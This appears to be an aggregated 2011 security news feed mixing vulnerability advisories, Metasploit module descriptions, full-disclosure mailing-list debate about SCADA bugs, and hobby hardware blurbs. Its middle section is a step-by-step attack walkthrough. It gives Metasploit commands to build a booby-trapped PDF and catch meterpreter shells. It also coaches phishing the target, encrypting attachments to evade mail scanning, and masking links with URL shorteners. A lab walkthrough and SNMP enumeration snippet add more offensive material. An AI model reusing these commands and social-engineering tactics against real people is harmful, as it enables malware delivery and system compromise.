Secunia Security Advisory - Ubuntu has issued an update for linux. This fixes multiple weaknesses and vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service), disclose certain system and potentially sensitive information, bypass certain security restrictions, and gain escalated privileges and by malicious people to cause a DoS.

Secunia Security Advisory - Red Hat has issued an update for seamonkey. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site request forgery attacks and compromise a user's system.

Secunia Security Advisory - Red Hat has issued an update for the kernel. This fixes a weakness and some vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and to disclose system information and by malicious people to cause a DoS.

Secunia Security Advisory - Ubuntu has issued an update for linux and linux-ec2. This fixes multiple weaknesses, a security issue and multiple vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service), disclose certain system and potentially sensitive information, bypass certain security restrictions, and gain escalated privileges and by malicious people to cause a DoS.

Secunia Security Advisory - Multiple vulnerabilities have been reported in Moodle, which can be exploited by malicious users to conduct script insertion attacks and bypass certain security restrictions and by malicious people to disclose certain sensitive information and conduct cross-site scripting or cross-site request forgery attacks.

Secunia Security Advisory - Debian has issued an update for pango1.0. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise an application using the library.

Secunia Security Advisory - SUSE has issued an update for tomcat6. This fixes multiple vulnerabilities, which can be exploited by malicious, local users to bypass certain security restrictions and by malicious people to conduct cross-site scripting attacks and cause a DoS (Denial of Service).

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is because overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

This Metasploit module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending a specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold.

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending a specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

Debian Linux Security Advisory 2201-1 - Huzaifa Sidhpurwala, Joernchen, and Xiaopeng Zhang discovered several vulnerabilities in the Wireshark network traffic analyzer. Vulnerabilities in the DCT3, LDAP and SMB dissectors and in the code to parse pcap-ng files could lead to denial of service or the execution of arbitrary code.

Debian Linux Security Advisory 2200-1 - This update for Iceweasel, a web browser based on Firefox, updates the certificate blacklist for several fraudulent HTTPS certificates. More details can be found in a blog posting by Jacob Appelbaum of the Tor project.

Core Security Technologies Advisory - Two vulnerabilities have been found in VLC media player, when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC. Versions 1.1.4 through 1.1.7 are affected.

Brief Overview
This screencast demonstrates vulnerabilities in Adobe PDF Reader. Instead of creating a mass of vulnerable files, the attacker creates two PDFs (one relies on no user interaction and crashes the reader, whereas the other requires the user to click through a few warning screens but then presents them with a document).

The attacker emails these documents to the target (though they have to compress and encrypt the documents).

What do I need?
* Metasploit – (Can be found on BackTrack 4-R2). Download here
* SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
* A PDF document (Either create your own or find one by using an Internet search engine).
* The target will need a vulnerable version of Adobe Reader (v9.3 for example). Download here

Method
* Start network services and obtain an IP address
* Run metasploit and search for PDF exploits
* Configure exploit and create a vulnerable file
* Compress and encrypt PDF
* Socially engineer an email to the target and attach file
* Wait for target to download and open file
* Game Over
* Locate a "legit" PDF document and bind with exploit
* Compress and encrypt PDF document
* Socially engineer an email to the target and attach file
* Wait for target to download and open file
* Game Over ...again

use windows/fileformat/adobe_pdf_embedded_exe
info
show options
set FILENAME evil2.pdf
#set EXENAME evil.exe #ENCODE
set LAUNCH_MESSAGE Be sure to re-save when shown and then click open.
set INFILENAME /root/good.pdf
show options
exploit
use exploit/multi/handler
show options
exploit -j

sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuid

Walk-through
The attacker approaches this attack similarly to a previous method; however, instead of producing a collection of different files that are not going to be used, they choose to use a program which is very commonly installed (and also not updated often!), Adobe Reader.

To start things going, the attacker starts their network connection and runs metasploit. When metasploit is ready, they search its database for known exploits for PDF files. "windows/fileformat/adobe_libtiff" has the latest Disclosure Date (2010-02-16) relative to today's date (2011-03-22). After choosing it and looking at the exploit in more detail, the attacker notes the vulnerable versions of Adobe Reader (versions 8.0 - 8.2, 9.0 - 9.3) which the target HAS to have for this exploit to work.

The attacker then proceeds to enter all the necessary information for the exploit to function, then creates the exploit when it is ready.

Like before, the attacker chooses to socially engineer the target by sending them an email, but this time around they want to attach the file instead of linking to it.
The attacker enters a brief description of what the PDF is meant to contain. However, when the attacker tries to send the PDF, the SMTP server rejects the PDF attachment. The attacker compresses and encrypts the PDF, which prevents detection (the attacker alters the original message to include what the password is).

The attacker can sit back and relax until the target opens the PDF document... Which the target does =). However! When the target opens the PDF document, the reader "crashes" before they could read the document. So they email back saying they are unable to read it. The attacker then replies with the "correct" PDF...

Again, the attacker proceeds to enter all the necessary information for the exploit to function, creates the new document and delivers it using the same method as before. Just like before, there is nothing left for the attacker to do except wait for the target to open the document...

After the target has refreshed their inbox, they notice they have got the "correct" PDF. Upon opening the file, a "Save as" window pops up (1), and of course they wish to save the PDF or just want to read the document so they just click next... After reading the message (2), then click on "open". After doing those steps the target is able to read the document...

...meanwhile the exploit has worked and the attacker has another meterpreter shell on the target's machine.

(1) This is really a meterpreter agent, NOT the PDF file which it says it was. It has cloned the filename from the PDF the attacker used.
(2) The message is what the attacker left ;)

What do I need?
* Metasploit – (Can be found on BackTrack 4-R2). Download here
* SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
* URL shortener service – (Can be found by using an Internet search engine).

Method
* Start network services and obtain an IP address
* Start metasploit and configure file_autopwn
* Wait for web server to be active
* Browse available files and view information on that particular one.
* Discover homepage and download information
* Create masked URLs
* Socially engineer an email to the target with all the information
* Wait for target to download the file and load it in the program
* Game Over

sessions -l -v
sessions -i 1
sysinfo
getuid
getsystem
getuid

Walk-through
The attacker approaches this attack differently, by attacking desktop applications installed on the operating system (OS) using a collection of “file exploits”.

To start things, the attacker starts metasploit and locates the file_autopwn module. After examining the required information, the attacker proceeds with entering all the details which are needed. Once this has been done, the attacker sets metasploit to work creating a mass of vulnerable files; once they have been created, metasploit sets up a web server which is going to be used for the delivery method.

The attacker visits the web server themselves to see what is available. After choosing the program "fatplayer", they decide to increase their chance of success by finding the program's homepage so they can pass this information on to the target, which makes it "nice and easy" for the target to download and run.
The attacker needs to make sure that they send a vulnerable version of the program to the target, however, so they check to see what information is given about the file exploit.

The attacker chooses to socially engineer the target by sending them an email with a link to the file, the setup and a brief description. To help increase success, the attacker masks the URL of both files by using URL shortening services. Once the target clicks on the shortened link, they are automatically redirected to the "longer URL".

The attacker just has to simply wait to see if the target "falls for it" and runs the exploit file.... Which the target does. =)

Notes:
* You will need to find/use your own SMTP details.
* You can use any number of URL shortening services.
* You could have used any of the files generated by metasploit.
* You could have attached the file instead of linking to it in the email (See here for an example), however a lot of email services now have anti-virus checking built in...

Brief Overview
Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness, which is a quick attack and straight to root.

Walkthrough
A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and their versions as well as trying to identify the operating system (OS). The result of this is:
* OS: Linux v2.4.x (2.4.9-18)
* Samba: Samba smbd (workgroup: MYGROUP)

The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:
* Anonymous login
* Hostname (KIOPTRIX)
* Workgroup (MYGROUP)
* Default hidden admin shares (IPC$, ADMIN$)

The attack process begins with the attacker starting up metasploit and searching for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.

[Ed] had a netbook he no longer needed and decided to make it into a mini MAME cabinet for some of his family members. MAME cabinets are pretty plentiful, but this one was so nicely done, we wanted to share it. He removed the monitor from an EeePC 901 in order to get some precise [...]

[Ben Krasnow] has recently completed a home-built scanning electron microscope and has posted a video of it in action on his blog. The build itself was done quite creatively using many off-the shelf components. We particularly like how long threaded brass rods were used not only for the supports, but also to maintain column alignment [...]

re: """The IP address of the initial attack was recorded and has been
determined to be assigned to an ISP in Iran. A web survey revealed one
of the certificates deployed on another IP address assigned to an
Iranian ISP. The server in question stopped responding to requests
shortly after the certificate was revoked....
While the involvement of two IP addresses assigned to Iranian ISPs is
suggestive of an origin, this may be the...

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info
...SNIP...
Description: This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

SCADA systems are infamous for being terribly insecure. (You can search
the internet for demonstration video of equipment catching fire because
of such bugs.) SCADA manufacturers seem to have a firewall mentality
that excuses them from needing to be secure.

I am not at all surprised to see these bugs, though I do cringe at how
embarrassing they are. Heaping some embarrassment on the vendors seems
well deserved.

[Akiba] and the crew at Tokyo Hakerspace are still hard at work trying to help out their fellow countrymen after the recent earthquake, tsunami, and ongoing nuclear crisis in Japan. You may remember the group as they are behind the Kimono Lantern project we featured last week. This time around, their efforts are focused on [...]

1 - Full disclosure
2 - Publicly, the vendor looks bad to customers
3 - A fix is crafted immediately; tested rapidly, then released to
customers.
4 - Publicly, customer and vendor would look bad if they did not
install the fix immediately -- as soon as it is available

I am very well aware of what is going on out there in industry:
Customers do not install patches unless...

Actually they have the choice to not run SCADA systems open to the
Internet. If they are so critical that you are "playing with fire" like
you mentioned in another email, why would they be accessible via script
kiddie attack, or any remote over-the-tubes attack? Running SCADA
systems open to the entire Internet is what I would call irresponsible.

At this point, it is academic anyway. The cat is out of the bag. Thanks
Luigi, I at...

no problem, if you don't agree with full-disclosure or how I and the
other researchers like me handle these security vulnerabilities you have
the full power and freedom of finding them by yourself and handling them
as you desire.

so now the question is, why don't all these "good guys" spend their
personal time and skills to find these vulnerabilities and report
them to the vendors before me?

PHP-Nuke versions 8.x and lower are vulnerable to Cross Site Scripting.

2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access...

You're flawed in your response: "Public exposure increases the
visibility, and therefore customers install the patches quicker." ...
When someone "full discloses" a vulnerability, there is no patch to
install quicker. This is obvious because there is no patch until either
the vendor releases one, or staff using the product are capable of
creating a work-around. In the case of the SCADA environment, we (again)
are not talking...

[Will Jack] built a heavy water fusion reactor and then won district and regional science fair projects with it. Someone give this man a job! We looked in on his fusion reactor about a year ago. At the time he had managed to build a magnetic containment field but didn’t have the voltages or the [...]

The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection.

2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page,...

You stated: "usually such people don't have the skills" Humor me and
others on this list why don't you... Reported to CERT two days ago:

Vulnerability Report
Vulnerability Description Over 300 ActiveX based vulnerabilities have
been discovered on multiple VMWare Server applications. Vulnerabilities
range from denial of service attacks to full control of EIP which can
lead to code execution
Vulnerability Impact Attacker can trigger code...

First; while I agree with your statement regarding the overuse of car analogies, the comparison is accurate and fair in
this case. The vendor's customers are now potentially at greater risk because of this announcement that includes no
mitigation.

Second; I fundamentally disagree with the idea that public disclosure as a means of vendor notification serves any
purpose beyond tooting one's own horn and causing a panic state for the...

[Viktor] decided to replace his old power hungry home server with a model that is much easier on the old electric bill. The new motherboard uses an Intel Atom chip and consumes far less power than its predecessor. He figured there was no reason to use a bulky ATX power supply when all he needed [...]

The Progea Movicon 11 TCPUploadServer allows remote users to execute functions on the server without any form of authentication. Impacts include deletion of arbitrary files, execution of a program with an arbitrary argument, crashing the server, information disclosure, and more. This design flaw puts the host running this server at risk of potentially unauthorized functions being executed on the system.

You appear to assume that because no one else has reported these vulns
publicly that no one else has discovered them. This is false logic; proof
is not satisfied by a lack of evidence to the contrary.
To be clear, I do appreciate researchers who spend their time seeking and
reporting security issues and sometimes "just bugz" in vendor software -
it's this sort of independent scrutiny that keeps the vendors honest and on
their toes....

There are multiple remote uninitialized pointer free conditions in IGSS's ODBC server. By sending a specially crafted packet to listening port 20222, it is possible to crash the server. Execution of arbitrary code is unlikely.

That's fine, but the controversy around the proper mode of disclosure
is here to stay. For every good argument you make, there is an equally
compelling counter-argument that other reasonable people believe in
good faith. It really comes down to personal beliefs, and nothing has
changed here in the past 15 years or so.

Any of us can disagree, but lashing out against other people seems
first of all impolite, and second, somewhat amusing on this...

Zero Day Initiative Advisory 11-112 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Data Protector. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBServer.exe process which listens by default on TCP port 19813. While parsing a request, the process trusts a user-supplied 32-bit length value and uses it within a memory operation. By specifying large enough values in a packet sent to the service, a remote attacker can execute arbitrary code under the context of the SYSTEM user.

Zero Day Initiative Advisory 11-111 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Virtual SAN appliance. Authentication is not required to exploit this vulnerability. The flaw exists within the hydra.exe component which listens by default on port 13838. When parsing a login request the Hydra daemon will call sscanf() using fixed-length stack buffers and no length checks. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM service.

While I support full disclosure, I also advocate responsible disclosure. The public _has_ a right to know, but in this
case, they can play no significant part in remedy or mitigation unless they are employees of the vendor or the
customer. I believe the best course of action for a SCADA vulnerability would be to let the vendor know first, let
them know you intend to disclose publicly after a reasonable time, then release to the potential...

I and another research fellow, AlanH0, have carried out basic Web vulnerability digging over 80 companies including government, banks and listed companies in Hong Kong. We would like to see whether they have done their webapp security "homework" well since 2004 (i.e. since the OWASP Top 10 vulnerabilities were published). Amazingly, we have found over 120 basic vulnerabilities out of 90 organizations.

Did they still stay in a stone age that simply trusts the scanner's "no risk", feeling secure and safe afterwards?
Did they get the right party for the penetration test?
Did they still believe that only a CISSP could be the penetration tester?
Did they engage any secure software and system development lifecycle?
Did their developers get training regularly?

Does the image of the clock above make you shudder with fear because of the math you’d need to use to recreate your own version of the project? We certainly understand that High School geometry is becoming a very distant memory, but it’s really not as hard as you think. [Janw] built this analog clock [...]

The Open Source Hardware (OSHW) initiative is rolling right along. But now it’s time for you to share your input. The movement is choosing a logo and you get to decide which one it will be. The ten finalists shown above were narrowed down from the 129 submissions received during the public call for logos. [...]

Instructables user [Bruno] recently constructed a fun little toy that brings a bit of the Mario nostalgia out of the video game universe and into ours. His Super Mario coin block is instantly recognizable from the first Mario game and performs just as you would expect it to. Punching or tapping the bottom of the [...]

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

This image was not made in post production, but captured during a long camera exposure. The method uses stencils to add components to a picture. [Alex] built a jig for his camera from a cardboard box. This jig positions a large frame in front of the camera lens where a printed stencil can be inserted. [...]

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming...

The author decided to follow a particular route, probably not out of
malice, but because he believes that his responsibilities to inform
the public outweigh the responsibility to assist the vendor. You
wouldn't do the same, but you haven't discovered these bugs.

Unless your view is that you would rather not know about
security problems at all, than see a disclosure mode you do not...

Have you ever wanted to be someone else, at least over the phone? Do you dream of turning the tables on telemarketers, making them hurry to get off the line instead of you? If so, [Brad] over at LucidScience has the project for you. A bit of a prankster at heart, he walks through the [...]

[Julian] was rummaging through a military surplus store when he spotted a pair of old helicopter pilot helmets that he absolutely had to have. At $25 they were a steal, but pretty useless in their current state. He decided to modify one of the helmets for use while playing video games, but he didn’t stop [...]

[Francois] over at 1024 Architecture has been working on a project we think you’ll be likely to see in a professional music video before too long. Using his Kinect sensor, he has been tracking skeletal movements, adding special effects to the resulting wire frame with Quartz Composer. While this idea isn’t new, the next part is. [...]

While SCADA is not something we’ve mentioned before, we have covered related areas with articles such as Industrial Control Systems Safe? I Think Not. Plus the whole Stuxnet thing, which was able to attack nuclear plants. In a way I find it ironic, because so much more emphasis these days is put on the security [...]

Hi, I am a Linux newbie and I have been using BT4-Final for some time. I just downloaded R2 and found out that wicd was updated to version 1.7 and the BSSID is not displayed in its main window any more. The problem is that I am connecting to a public AP named WLAN and there are at least 8 other slower open networks named WLAN. Is there any way to display the BSSID again on the main window instead of having to check properties > information?